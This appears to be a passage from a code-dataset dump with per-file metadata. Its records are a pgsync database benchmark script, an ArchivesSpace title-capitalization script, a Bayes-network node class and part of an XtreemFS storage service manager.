motion_measures = normalized.drop(columns=['time', 'label'])
plot_lines(motion_measures, name=f"{gesture} normalized measurements",
filepath=os.path.join(test_output, f"{gesture}-norm-lines.png"))
plot_lines(motion_measures, name=f"{gesture} normalized window={SAMPLES_PER_RECORDING}",
filepath=os.path.join(test_output, f"{gesture}-norm-lines-window{SAMPLES_PER_RECORDING}.png"),
vertical_tick_spacing=SAMPLES_PER_RECORDING)
histogram_overlay(motion_measures, name=f"{gesture} normalized measurements",
filepath=os.path.join(test_output, f"{gesture}-norm-over-hist.png"))
# https://numpy.org/doc/stable/reference/generated/numpy.allclose.html
assert np.allclose(normalized.mean(), 0.0)
assert np.allclose(normalized.std(), 1.0)
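# A hedged sketch of the z-score normalization this test expects (mean 0, std 1 per
# column); the real normalize_mean_std_dict lives in
# iotai_sensor_classification.normalization and may differ in detail (e.g. which
# columns it skips).
def _zscore_sketch(df):
    """Return a standardized copy of a DataFrame: (x - mean) / std per column."""
    return (df - df.mean()) / df.std()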
| 1,621
| 0
| 23
|
fb9c84f69582b895624fd919a820ac62d428a59c
| 4,791
|
py
|
Python
|
examples/book_view/benchmark.py
|
toluaina/essync
|
4a0119d99760eaa193f4ae60abd2b5f38482b280
|
[
"BSD-3-Clause"
] | 1
|
2019-09-26T21:05:37.000Z
|
2019-09-26T21:05:37.000Z
|
examples/book_view/benchmark.py
|
toluaina/essync
|
4a0119d99760eaa193f4ae60abd2b5f38482b280
|
[
"BSD-3-Clause"
] | null | null | null |
examples/book_view/benchmark.py
|
toluaina/essync
|
4a0119d99760eaa193f4ae60abd2b5f38482b280
|
[
"BSD-3-Clause"
] | 1
|
2019-08-27T16:19:09.000Z
|
2019-08-27T16:19:09.000Z
|
import json
from random import choice
from typing import Set
import click
import sqlalchemy as sa
from faker import Faker
from schema import Book
from sqlalchemy.orm import sessionmaker
from pgsync.base import pg_engine
from pgsync.constants import DELETE, INSERT, TG_OP, TRUNCATE, UPDATE
from pgsync.utils import get_config, show_settings, Timer
FIELDS = {
"isbn": "isbn13",
"title": "sentence",
"description": "text",
"copyright": "word",
}
@click.command()
@click.option(
"--config",
"-c",
help="Schema config",
type=click.Path(exists=True),
)
@click.option("--daemon", "-d", is_flag=True, help="Run as a daemon")
@click.option("--nsize", "-n", default=5000, help="Number of samples")
@click.option(
"--tg_op",
"-t",
help="TG_OP",
type=click.Choice(
TG_OP,
case_sensitive=False,
),
)
if __name__ == "__main__":
main()
| 29.757764
| 77
| 0.529743
|
import json
from random import choice
from typing import Set
import click
import sqlalchemy as sa
from faker import Faker
from schema import Book
from sqlalchemy.orm import sessionmaker
from pgsync.base import pg_engine
from pgsync.constants import DELETE, INSERT, TG_OP, TRUNCATE, UPDATE
from pgsync.utils import get_config, show_settings, Timer
FIELDS = {
"isbn": "isbn13",
"title": "sentence",
"description": "text",
"copyright": "word",
}
def insert_op(session: sessionmaker, model, nsize: int) -> None:
faker: Faker = Faker()
rows: Set = set([])
for _ in range(nsize):
kwargs = {}
for column in model.__table__.columns:
if column.foreign_keys:
foreign_key = list(column.foreign_keys)[0]
pk = [
column.name
for column in foreign_key.column.table.columns
if column.primary_key
][0]
fkey = (
session.query(foreign_key.column.table)
.order_by(sa.func.random())
.limit(1)
)
value = getattr(fkey[0], pk)
kwargs[column.name] = value
elif column.primary_key:
continue
else:
field = FIELDS.get(column.name)
if not field:
# continue
raise RuntimeError(f"field {column.name} not in mapping")
value = getattr(faker, field)()
kwargs[column.name] = value
print(f"Inserting {model.__table__} VALUES {kwargs}")
row = model(**kwargs)
rows.add(row)
with Timer(f"Created {nsize} {model.__table__} in"):
try:
session.add_all(rows)
session.commit()
except Exception as e:
print(f"Exception {e}")
session.rollback()
def update_op(session: sessionmaker, model, nsize: int) -> None:
column: str = choice(list(FIELDS.keys()))
if column not in [column.name for column in model.__table__.columns]:
raise RuntimeError()
faker: Faker = Faker()
with Timer(f"Updated {nsize} {model.__table__}"):
for _ in range(nsize):
field = FIELDS.get(column)
value = getattr(faker, field)()
row = (
session.query(model)
.filter(getattr(model, column) != value)
.order_by(sa.func.random())
.limit(1)
)
if row:
print(f'Updating {model.__table__} SET {column} = "{value}"')
try:
setattr(row[0], column, value)
session.commit()
except Exception as e:
session.rollback()
def delete_op(session: sessionmaker, model, nsize: int) -> None:
with Timer(f"Deleted {nsize} {model.__table__}"):
for _ in range(nsize):
row = session.query(model).order_by(sa.func.random()).limit(1)
pk = [
column.name
for column in filter(
lambda x: x.primary_key, model.__table__.columns
)
][0]
if row:
try:
value = getattr(row[0], pk)
print(f"Deleting {model.__table__} WHERE {pk} = {value}")
session.query(model).filter(
getattr(model, pk) == value
).delete()
session.commit()
except Exception as e:
session.rollback()
@click.command()
@click.option(
"--config",
"-c",
help="Schema config",
type=click.Path(exists=True),
)
@click.option("--daemon", "-d", is_flag=True, help="Run as a daemon")
@click.option("--nsize", "-n", default=5000, help="Number of samples")
@click.option(
"--tg_op",
"-t",
help="TG_OP",
type=click.Choice(
TG_OP,
case_sensitive=False,
),
)
def main(config, nsize, daemon, tg_op):
show_settings()
config: str = get_config(config)
documents: dict = json.load(open(config))
engine = pg_engine(
database=documents[0].get("database", documents[0]["index"])
)
Session = sessionmaker(bind=engine, autoflush=False, autocommit=False)
session = Session()
model = Book
func = {
INSERT: insert_op,
UPDATE: update_op,
DELETE: delete_op,
}
# lets do only the book model for now
while True:
if tg_op:
func[tg_op](session, model, nsize)
else:
func[choice(TG_OP)](session, model, nsize)
if not daemon:
break
if __name__ == "__main__":
main()
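A hedged invocation sketch using click's test runner; it assumes the file is importable as benchmark and that a schema config plus a reachable Postgres database exist, as main() above requires.
from click.testing import CliRunner
from benchmark import main  # assumes this file is importable as benchmark.py

runner = CliRunner()
# the --config path and a running database are prerequisites, not provided here
result = runner.invoke(main, ["--config", "schema.json",
                              "--tg_op", "INSERT", "--nsize", "100"])
print(result.exit_code, result.output)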
| 3,797
| 0
| 91
|
b388ad646acdaff30e3ae11dca9c423ac5dc3c80
| 794
|
py
|
Python
|
resources/ArchivesSpace post-migration scripts/TitleCapitalization.py
|
smith-special-collections/aspace-migration
|
0ad6f1346df52e12739f27b54570586af4362559
|
[
"MIT"
] | 2
|
2016-09-14T12:31:40.000Z
|
2018-05-25T02:45:37.000Z
|
resources/ArchivesSpace post-migration scripts/TitleCapitalization.py
|
smith-special-collections/aspace-migration
|
0ad6f1346df52e12739f27b54570586af4362559
|
[
"MIT"
] | 1
|
2017-04-13T16:24:59.000Z
|
2017-04-18T19:30:08.000Z
|
resources/ArchivesSpace post-migration scripts/TitleCapitalization.py
|
smith-special-collections/aspace-migration
|
0ad6f1346df52e12739f27b54570586af4362559
|
[
"MIT"
] | null | null | null |
import requests
import json
aspace_url = 'http://localhost:8089'
username = 'admin'
password = 'admin'
repo_num = '2'
auth = requests.post(aspace_url+'/users/'+username+'/login?password='+password).json()
session = auth["session"]
headers = {'X-ArchivesSpace-Session':session}
for d in range(1,6):
resource_json = requests.get(aspace_url+'/repositories/'+repo_num+'/resources/'+str(d), headers=headers).json()
resource_title = resource_json['title']
print 'Current title is: ' +resource_title
if 'Papers' in resource_title:
resource_json["title"] = resource_json['title'].replace(" Papers"," papers")
updated = requests.post(aspace_url+'/repositories/'+repo_num+'/resources/'+str(d), headers=headers, data=json.dumps(resource_json))
print 'New title is: ' + resource_json["title"]
| 37.809524
| 133
| 0.730479
|
import requests
import json
aspace_url = 'http://localhost:8089'
username = 'admin'
password = 'admin'
repo_num = '2'
auth = requests.post(aspace_url+'/users/'+username+'/login?password='+password).json()
session = auth["session"]
headers = {'X-ArchivesSpace-Session':session}
for d in range(1,6):
resource_json = requests.get(aspace_url+'/repositories/'+repo_num+'/resources/'+str(d), headers=headers).json()
resource_title = resource_json['title']
print 'Current title is: ' +resource_title
if 'Papers' in resource_title:
resource_json["title"] = resource_json['title'].replace(" Papers"," papers")
updated = requests.post(aspace_url+'/repositories/'+repo_num+'/resources/'+str(d), headers=headers, data=json.dumps(resource_json))
print 'New title is: ' + resource_json["title"]
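For reference, a Python 3 rendering of the same loop (identical endpoints and payload; only the print statements and string formatting change):
for d in range(1, 6):
    resource_json = requests.get(f'{aspace_url}/repositories/{repo_num}/resources/{d}',
                                 headers=headers).json()
    print('Current title is: ' + resource_json['title'])
    if 'Papers' in resource_json['title']:
        resource_json['title'] = resource_json['title'].replace(' Papers', ' papers')
    updated = requests.post(f'{aspace_url}/repositories/{repo_num}/resources/{d}',
                            headers=headers, data=json.dumps(resource_json))
    print('New title is: ' + resource_json['title'])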
| 0
| 0
| 0
|
2abcfcc2281955e4ae7cbe49ec5370d4ae3c495c
| 540
|
py
|
Python
|
Node.py
|
akshaykamath/Bayes-Network-Inference-Algorithms
|
3a0867130dd74bf2444a7ce4f972fff6b1a989dc
|
[
"MIT"
] | null | null | null |
Node.py
|
akshaykamath/Bayes-Network-Inference-Algorithms
|
3a0867130dd74bf2444a7ce4f972fff6b1a989dc
|
[
"MIT"
] | null | null | null |
Node.py
|
akshaykamath/Bayes-Network-Inference-Algorithms
|
3a0867130dd74bf2444a7ce4f972fff6b1a989dc
|
[
"MIT"
] | null | null | null |
__author__ = 'Akshay'
| 21.6
| 48
| 0.625926
|
__author__ = 'Akshay'
class Node:
initial_time = 0
finish_time = 0
name = None
child_nodes = None
parent_nodes = None
conditional_probability_table = {}
def __init__(self, nm):
self.name = nm
self.parent_distance = 0
self.child_nodes = []
self.parent_nodes = []
def add_child(self, node=None, weight=None):
self.child_nodes.append((node, weight))
node.parent_nodes.append(self)
    def has_child(self, node=None):
        # child_nodes stores (node, weight) tuples, so compare against the node element
        return any(child is node for child, _ in self.child_nodes)
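A minimal usage sketch for the Node class above (node names and the unweighted edges are illustrative):
rain = Node("Rain")
sprinkler = Node("Sprinkler")
wet_grass = Node("WetGrass")

rain.add_child(wet_grass)          # stored internally as a (node, weight) tuple
sprinkler.add_child(wet_grass)

print(rain.has_child(wet_grass))   # True
print(wet_grass.parent_nodes)      # [rain, sprinkler]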
| 279
| 214
| 23
|
90d1a8e84d85bc7f4e6d8664cd0c5d4332376007
| 38,126
|
py
|
Python
|
conpaas-services/src/conpaas/services/xtreemfs/manager/manager.py
|
bopopescu/conpaas
|
e0a2955ae3e7da7525d799bed411e9f76ecf0919
|
[
"BSD-3-Clause"
] | 1
|
2015-09-20T18:20:01.000Z
|
2015-09-20T18:20:01.000Z
|
conpaas-services/src/conpaas/services/xtreemfs/manager/manager.py
|
bopopescu/conpaas
|
e0a2955ae3e7da7525d799bed411e9f76ecf0919
|
[
"BSD-3-Clause"
] | 1
|
2020-07-27T11:56:18.000Z
|
2020-07-27T11:56:18.000Z
|
conpaas-services/src/conpaas/services/xtreemfs/manager/manager.py
|
bopopescu/conpaas
|
e0a2955ae3e7da7525d799bed411e9f76ecf0919
|
[
"BSD-3-Clause"
] | 3
|
2018-09-14T16:54:14.000Z
|
2020-07-26T03:14:56.000Z
|
# -*- coding: utf-8 -*-
"""
:copyright: (C) 2010-2013 by Contrail Consortium.
"""
from threading import Thread
from conpaas.core.expose import expose
from conpaas.core.manager import BaseManager
from conpaas.core.manager import ManagerException
from conpaas.core.https.server import HttpJsonResponse, HttpErrorResponse
from conpaas.services.xtreemfs.agent import client
import uuid
import base64
import subprocess
| 38.864424
| 138
| 0.577087
|
# -*- coding: utf-8 -*-
"""
:copyright: (C) 2010-2013 by Contrail Consortium.
"""
from threading import Thread
from conpaas.core.expose import expose
from conpaas.core.manager import BaseManager
from conpaas.core.manager import ManagerException
from conpaas.core.https.server import HttpJsonResponse, HttpErrorResponse
from conpaas.services.xtreemfs.agent import client
import uuid
import base64
import subprocess
def invalid_arg(msg):
return HttpErrorResponse(ManagerException(
ManagerException.E_ARGS_INVALID, detail=msg).message)
class XtreemFSManager(BaseManager):
def __init__(self, config_parser, **kwargs):
BaseManager.__init__(self, config_parser)
# node lists
self.nodes = [] # all nodes
self.osdNodes = [] # only the OSD nodes
        self.mrcNodes = []  # only the MRC nodes
self.dirNodes = [] # only the DIR nodes
# node counters
self.dirCount = 0
self.mrcCount = 0
self.osdCount = 0
        # whether we want to keep storage volumes upon OSD node deletion
self.persistent = False
# default value for OSD volume size
self.osd_volume_size = 1024
# dictionaries mapping node IDs to uuids
self.dir_node_uuid_map = {}
self.mrc_node_uuid_map = {}
self.osd_node_uuid_map = {}
# dictionary mapping osd uuids to volume IDs
self.osd_uuid_volume_map = {}
# Setup the clouds' controller
self.controller.generate_context('xtreemfs')
def __get__uuid(self, node_id, node_type):
if node_type == 'dir':
node_map = self.dir_node_uuid_map
elif node_type == 'mrc':
node_map = self.mrc_node_uuid_map
elif node_type == 'osd':
node_map = self.osd_node_uuid_map
else:
raise Exception("Unknown node type: %s" % node_type)
node_uuid = node_map.get(node_id)
if node_uuid:
self.logger.debug("%s already has a uuid (%s) -> %s" % (node_id,
node_type, node_uuid))
else:
node_uuid = str(uuid.uuid1())
node_map[node_id] = node_uuid
self.logger.debug("New uuid for %s (%s) -> %s" % (node_id,
node_type, node_uuid))
return node_uuid
def _start_dir(self, nodes):
self.logger.debug("_start_dir(%s)" % nodes)
for node in nodes:
try:
dir_uuid = self.__get__uuid(node.id, 'dir')
client.createDIR(node.ip, 5555, dir_uuid)
except client.AgentException:
self.logger.exception('Failed to start DIR at node %s' % node)
self.state = self.S_ERROR
raise
def _stop_dir(self, nodes, remove):
for node in nodes:
try:
client.stopDIR(node.ip, 5555)
except client.AgentException:
self.logger.exception('Failed to stop DIR at node %s' % node)
self.state = self.S_ERROR
raise
if remove:
del self.dir_node_uuid_map[node.id]
def _start_mrc(self, nodes):
for node in nodes:
try:
mrc_uuid = self.__get__uuid(node.id, 'mrc')
client.createMRC(node.ip, 5555, self.dirNodes[0].ip, mrc_uuid)
except client.AgentException:
self.logger.exception('Failed to start MRC at node %s' % node)
self.state = self.S_ERROR
raise
def _stop_mrc(self, nodes, remove):
for node in nodes:
try:
client.stopMRC(node.ip, 5555)
except client.AgentException:
self.logger.exception('Failed to stop MRC at node %s' % node)
self.state = self.S_ERROR
raise
if remove:
del self.mrc_node_uuid_map[node.id]
def _start_osd(self, nodes, cloud=None):
for idx, node in enumerate(nodes):
osd_uuid = self.__get__uuid(node.id, 'osd')
volume_associated = osd_uuid in self.osd_uuid_volume_map
# We need a storage volume for each OSD node. Check if this OSD
# node needs a new volume to be created.
if volume_associated:
# No need to create a new volume.
volume = self.get_volume(self.osd_uuid_volume_map[osd_uuid])
self.logger.debug(
'%s already has an associated storage volume (%s)' %
(osd_uuid, volume.id))
else:
# We need to create a new volume.
volume_name = "osd-%s" % osd_uuid
volume = self.create_volume(self.osd_volume_size, volume_name,
node.id, cloud)
self.osd_uuid_volume_map[osd_uuid] = volume.id
try:
self.attach_volume(volume.id, node.id, "sdb")
except Exception, err:
self.logger.error("attach_volume: %s" % err)
try:
client.createOSD(node.ip, 5555, self.dirNodes[0].ip, osd_uuid,
mkfs=not volume_associated)
except client.AgentException:
self.logger.exception('Failed to start OSD at node %s' % node)
self.state = self.S_ERROR
raise
def _stop_osd(self, nodes, remove, drain):
"""Stop OSD service on the given nodes.
The volume is always detached.
If remove is True, the volume is destroyed and node and volume are
deleted from internal data structures.
If drain is True, data is moved to other OSDs."""
for node in nodes:
try:
client.stopOSD(node.ip, 5555, drain)
except client.AgentException:
self.logger.exception('Failed to stop OSD at node %s' % node)
self.state = self.S_ERROR
raise
volume_id = self.osd_uuid_volume_map[self.osd_node_uuid_map[node.id]]
self.detach_volume(volume_id)
# destroy volumes and delete entries from internal state
if remove:
self.destroy_volume(volume_id)
del self.osd_uuid_volume_map[self.osd_node_uuid_map[node.id]]
del self.osd_node_uuid_map[node.id]
else:
self.logger.debug('Not destroying volume %s' % volume_id)
def _do_startup(self, cloud, resuming=False):
"""Starts up the service. The first nodes will contain all services.
If 'resuming' is set to True, we do not start XtreemFS services now.
set_service_snapshot will do that.
"""
startCloud = self._init_cloud(cloud)
try:
# NOTE: The following service structure is enforce:
# - the first node contains a DIR, MRC and OSD,
# those services can not be removed
# - added DIR, MRC and OSD services will all run
# on exclusive nodes
# - all explicitly added services can be removed
# create 1 node
node_instances = self.controller.create_nodes(1,
client.check_agent_process, 5555, startCloud)
# use this node for DIR, MRC and OSD
self.nodes += node_instances
self.dirNodes += node_instances
self.mrcNodes += node_instances
self.osdNodes += node_instances
# start DIR, MRC, OSD
if not resuming:
self._start_dir(self.dirNodes)
self._start_mrc(self.mrcNodes)
self._start_osd(self.osdNodes, startCloud)
# at the startup the DIR node will have all the services
self.dirCount = 1
self.mrcCount = 1
self.osdCount = 1
self.logger.info('Created 1 node with DIR, MRC and OSD services')
except:
self.logger.exception('do_startup: Failed to request a new node')
self.state = self.S_STOPPED
return
self.logger.info('XtreemFS service was started up')
self.state = self.S_RUNNING
@expose('POST')
def shutdown(self, kwargs):
self.state = self.S_EPILOGUE
# start _do_shutdown(stop_services=True) in a thread
Thread(target=self._do_shutdown, args=[True]).start()
return HttpJsonResponse()
def _start_all(self):
self._start_dir(self.dirNodes)
self._start_mrc(self.mrcNodes)
self._start_osd(self.osdNodes)
def _stop_all(self, remove=True):
"""Stop all xtreemfs services on all agents (first osd, then mrc, then
dir)."""
# do not drain (move data to other OSDs), since we stop all
self._stop_osd(self.osdNodes, remove=remove, drain=False)
self._stop_mrc(self.mrcNodes, remove=remove)
self._stop_dir(self.dirNodes, remove=remove)
def _do_shutdown(self, stop_services=False):
# check if we need to stop the services or not, i.e. when called at
# the end of get_snapshot()
if stop_services:
self._stop_all(remove=True)
self.controller.delete_nodes(self.nodes)
self.nodes = []
self.dirNodes = []
self.mrcNodes = []
self.osdNodes = []
self.dirCount = 0
self.mrcCount = 0
self.osdCount = 0
self.dir_node_uuid_map = {}
self.mrc_node_uuid_map = {}
self.osd_node_uuid_map = {}
self.osd_uuid_volume_map = {}
self.state = self.S_STOPPED
return HttpJsonResponse()
@expose('POST')
def add_nodes(self, kwargs):
#self.controller.add_context_replacement(dict(STRING='xtreemfs'))
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to add_nodes')
nr_dir = 0
nr_mrc = 0
nr_osd = 0
        resuming = False
if 'resuming' in kwargs:
resuming = kwargs['resuming']
# Adding DIR Nodes
if 'dir' in kwargs:
if not isinstance(kwargs['dir'], int):
return invalid_arg('Expected an integer value for "dir"')
nr_dir = int(kwargs.pop('dir'))
if nr_dir < 0:
return invalid_arg('Expected a positive integer value for "dir"')
# Adding MRC Nodes
if 'mrc' in kwargs:
if not isinstance(kwargs['mrc'], int):
return invalid_arg('Expected an integer value for "mrc"')
nr_mrc = int(kwargs.pop('mrc'))
if nr_mrc < 0:
return invalid_arg('Expected a positive integer value for "mrc"')
# TODO: 'osd' is no longer required, when adding other services is supported
if not 'osd' in kwargs:
return HttpErrorResponse('ERROR: Required argument doesn\'t exist')
if not isinstance(kwargs['osd'], int):
return HttpErrorResponse('ERROR: Expected an integer value for "osd"')
nr_osd = int(kwargs.pop('osd'))
if nr_osd < 0:
return invalid_arg('Expected a positive integer value for "nr osd"')
self.state = self.S_ADAPTING
Thread(target=self._do_add_nodes, args=[nr_dir, nr_mrc, nr_osd, kwargs['cloud'], resuming]).start()
return HttpJsonResponse()
# TODO: currently not used
def KillOsd(self, nodes):
for node in nodes:
client.stopOSD(node.ip, 5555)
self.osdNodes.remove(node)
def _do_add_nodes(self, nr_dir, nr_mrc, nr_osd, cloud, resuming=False):
startCloud = self._init_cloud(cloud)
totalNodes = nr_dir + nr_mrc + nr_osd
# try to create totalNodes new nodes
try:
node_instances = self.controller.create_nodes(totalNodes,
client.check_agent_process, 5555, startCloud)
except:
self.logger.exception('_do_add_nodes: Failed to request a new node')
self.state = self.S_STOPPED
return
self.nodes += node_instances
dirNodesAdded = node_instances[:nr_dir]
self.dirNodes += dirNodesAdded
mrcNodesAdded = node_instances[nr_dir:nr_mrc+nr_dir]
self.mrcNodes += mrcNodesAdded
osdNodesAdded = node_instances[nr_mrc+nr_dir:]
self.osdNodes += osdNodesAdded
# TODO: maybe re-enable when OSD-removal moves data to another node before shutting down the service.
#KilledOsdNodes = []
# The first node will contain the OSD service so it will be removed
# from there
#if nr_osd > 0 and self.osdCount == 0:
# KilledOsdNodes.append(self.dirNodes[0])
#self.KillOsd(KilledOsdNodes)
# Startup DIR agents
for node in dirNodesAdded:
client.startup(node.ip, 5555)
data = client.createDIR(node.ip, 5555)
self.logger.info('Received %s from %s', data, node.id)
self.dirCount += 1
# Startup MRC agents
for node in mrcNodesAdded:
client.startup(node.ip, 5555)
data = client.createMRC(node.ip, 5555, self.dirNodes[0].ip)
self.logger.info('Received %s from %s', data, node.id)
self.mrcCount += 1
# Startup OSD agents (if not resuming)
if not resuming:
self._start_osd(osdNodesAdded, startCloud)
self.osdCount += len(osdNodesAdded)
#for node in osdNodesAdded:
# client.startup(node.ip, 5555)
# data = client.createOSD(node.ip, 5555, self.dirNodes[0].ip)
# self.logger.info('Received %s from %s', data, node.id)
# self.osdCount += 1
self.state = self.S_RUNNING
return HttpJsonResponse()
@expose('GET')
def list_nodes(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpected')
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to list_nodes')
return HttpJsonResponse({
'dir': [node.id for node in self.dirNodes ],
'mrc': [node.id for node in self.mrcNodes],
'osd': [node.id for node in self.osdNodes]
})
@expose('GET')
def get_service_info(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpected')
return HttpJsonResponse({
'state': self.state,
'type': 'xtreemfs',
'persistent': self.persistent,
'osd_volume_size': self.osd_volume_size
})
@expose('GET')
def get_node_info(self, kwargs):
if 'serviceNodeId' not in kwargs:
return HttpErrorResponse('ERROR: Missing arguments')
serviceNodeId = kwargs.pop('serviceNodeId')
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpected')
serviceNode = None
for node in self.nodes:
if serviceNodeId == node.id:
serviceNode = node
break
if serviceNode is None:
return HttpErrorResponse('ERROR: Invalid arguments')
return HttpJsonResponse({
'serviceNode': {
'id': serviceNode.id,
'ip': serviceNode.ip,
'dir': serviceNode in self.dirNodes,
'mrc': serviceNode in self.mrcNodes,
'osd': serviceNode in self.osdNodes
}
})
@expose('POST')
def remove_nodes(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to remove_nodes')
nr_dir = 0
nr_mrc = 0
nr_osd = 0
# Removing DIR Nodes
if 'dir' in kwargs:
if not isinstance(kwargs['dir'], int):
return invalid_arg('Expected an integer value for "dir"')
nr_dir = int(kwargs.pop('dir'))
if nr_dir < 0:
return invalid_arg('Expected a positive integer value for "dir"')
if nr_dir > self.dirCount - 1: # we need at least 1 DIR
return invalid_arg('Cannot remove_nodes that many DIR nodes')
# Removing MRC nodes
if 'mrc' in kwargs:
if not isinstance(kwargs['mrc'], int):
return invalid_arg('Expected an integer value for "mrc"')
nr_mrc = int(kwargs.pop('mrc'))
if nr_mrc < 0:
return invalid_arg('Expected a positive integer value for "mrc"')
if nr_mrc > self.mrcCount - 1: # we need at least 1 MRC
return invalid_arg('Cannot remove_nodes that many MRC nodes')
# TODO: 'osd' is no longer required, when removing other services is supported
if not 'osd' in kwargs:
return HttpErrorResponse('ERROR: Required argument doesn\'t exist')
if not isinstance(kwargs['osd'], int):
return HttpErrorResponse(
'ERROR: Expected an integer value for "osd"')
nr_osd = int(kwargs.pop('osd'))
if nr_osd < 0:
return invalid_arg('Expected a positive integer value for "osd"')
if nr_osd > self.osdCount - 1: # we need at least 1 OSD
return invalid_arg('Cannot remove_nodes that many OSD nodes')
self.state = self.S_ADAPTING
Thread(target=self._do_remove_nodes, args=[nr_dir, nr_mrc, nr_osd]).start()
return HttpJsonResponse()
def _do_remove_nodes(self, nr_dir, nr_mrc, nr_osd):
# NOTE: the logically unremovable first node which contains all
# services is ignored by using 1 instead of 0 in:
# for _ in range(0, nr_[dir|mrc|osd]):
# node = self.[dir|mrc|osd]Nodes.pop(1)
if nr_dir > 0:
for _ in range(0, nr_dir):
node = self.dirNodes.pop(1)
self._stop_dir([node], remove=True)
self.controller.delete_nodes([node])
self.nodes.remove(node)
            self.dirCount -= nr_dir
if nr_mrc > 0:
for _ in range(0, nr_mrc):
node = self.mrcNodes.pop(1)
self._stop_mrc([node], remove=True)
self.controller.delete_nodes([node])
self.nodes.remove(node)
self.mrcCount -= nr_mrc
if nr_osd > 0:
for _ in range(0, nr_osd):
node = self.osdNodes.pop(1)
self._stop_osd([node], remove=True, drain=True)
self.controller.delete_nodes([node])
self.nodes.remove(node)
self.osdCount -= nr_osd
self.state = self.S_RUNNING
# TODO: maybe re-enable when OSD-removal moves data to another node before shutting down the service.
# if there are no more OSD nodes we need to start OSD service on the
# DIR node
#if self.osdCount == 0:
# self.osdNodes.append(self.dirNodes[0])
# self._start_osd(self.dirNodes)
return HttpJsonResponse()
@expose('POST')
def createMRC(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to create MRC service')
# Just createMRC from all the agents
for node in self.nodes:
data = client.createMRC(node.ip, 5555, self.dirNodes[0].ip)
self.logger.info('Received %s from %s', data, node.id)
return HttpJsonResponse({
'xtreemfs': [ node.id for node in self.nodes ],
})
@expose('POST')
def createDIR(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to create DIR service')
# Just createDIR from all the agents
for node in self.nodes:
data = client.createDIR(node.ip, 5555)
self.logger.info('Received %s from %s', data, node.id)
return HttpJsonResponse({
'xtreemfs': [ node.id for node in self.nodes ],
})
@expose('POST')
def createOSD(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to create OSD service')
# Just createOSD from all the agents
for node in self.nodes:
data = client.createOSD(node.ip, 5555, self.dirNodes[0].ip)
self.logger.info('Received %s from %s', data, node.id)
return HttpJsonResponse({
'xtreemfs': [ node.id for node in self.nodes ],
})
@expose('POST')
def createVolume(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to create Volume')
if not 'volumeName' in kwargs:
return HttpErrorResponse(
'ERROR: Required argument (volumeName) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
# Get the value of 'owner', if specified. 'xtreemfs' otherwise
owner = kwargs.pop('owner', 'xtreemfs')
args = [ 'mkfs.xtreemfs',
'%s:32636/%s' % (self.mrcNodes[0].ip, volumeName),
"-u", owner,
"-g", owner,
"-m", "777" ]
process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to create volume: %s; %s', stdout, stderr)
return HttpErrorResponse("The volume could not be created")
self.logger.info('Creating Volume: %s; %s', stdout, stderr)
return HttpJsonResponse()
@expose('POST')
def deleteVolume(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to delete Volume')
if not 'volumeName' in kwargs:
return HttpErrorResponse(
'ERROR: Required argument (volumeName) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
args = [ 'rmfs.xtreemfs',
'-f',
'%s:32636/%s' % (self.mrcNodes[0].ip, volumeName) ]
process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to delete volume: %s; %s', stdout, stderr)
return HttpErrorResponse("The volume could not be deleted")
self.logger.info('Deleting Volume: %s; %s', stdout, stderr)
# TODO(maybe): issue xtfs_cleanup on all OSDs to free space (or don't and assume xtfs_cleanup is run by a cron job or something)
return HttpJsonResponse()
@expose('GET')
def listVolumes(self, kwargs):
if len(kwargs) != 0:
            return HttpErrorResponse('ERROR: Arguments unexpected')
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to view volumes')
args = [ 'lsfs.xtreemfs', self.mrcNodes[0].ip + ':32636' ]
process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to view volume: %s; %s', stdout, stderr)
return HttpErrorResponse("The volume list cannot be accessed")
return HttpJsonResponse({ 'volumes': stdout })
# NOTE: see xtfsutil for the available policies
@expose('GET')
def list_striping_policies(self, kwargs):
if len(kwargs) != 0:
            return HttpErrorResponse('ERROR: Arguments unexpected')
return HttpJsonResponse({ 'policies': "RAID0" })
@expose('GET')
def list_replication_policies(self, kwargs):
if len(kwargs) != 0:
            return HttpErrorResponse('ERROR: Arguments unexpected')
return HttpJsonResponse({ 'policies': "ronly, WaR1, WqRq" })
@expose('GET')
def list_osd_sel_policies(self, kwargs):
if len(kwargs) != 0:
            return HttpErrorResponse('ERROR: Arguments unexpected')
return HttpJsonResponse({ 'policies': "DEFAULT, FQDN, UUID, DCMAP, VIVALDI" })
@expose('GET')
def list_replica_sel_policies(self, kwargs):
if len(kwargs) != 0:
            return HttpErrorResponse('ERROR: Arguments unexpected')
return HttpJsonResponse({ 'policies': "DEFAULT, FQDN, DCMAP, VIVALDI" })
def set_policy(self, volumeName, policyName, args):
mountPoint = '/tmp/' + volumeName
# mkdir -p <mountpoint>
process = subprocess.Popen(['mkdir', '-p', mountPoint])
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to set %s policy: %s; %s', policyName, stdout, stderr)
return HttpErrorResponse("Failed to set %s policy: %s; %s" % (policyName, stdout, stderr))
# mount.xtreemfs <dir_ip>:32638/<volumename> <mountpoint>
process = subprocess.Popen(['mount.xtreemfs',
'%s:32638/%s' % (self.dirNodes[0].ip, volumeName),
mountPoint],
